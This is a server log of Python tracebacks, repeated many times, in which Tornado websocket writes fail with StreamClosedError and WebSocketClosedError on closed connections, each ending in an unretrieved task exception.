Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35214' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35218' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35222' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35226' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35232' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35234' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35247' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35251' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35255' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35259' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35265' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35267' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35280' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35284' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35288' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35292' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35298' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35300' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35313' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35317' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35321' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35325' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35331' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35333' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35347' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35351' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35355' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35359' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35365' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35367' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35381' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35385' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35389' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35393' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35399' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35401' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35415' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35419' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35423' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35427' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35433' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35435' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35448' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35452' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35456' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35460' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35466' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35468' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35480' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35484' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
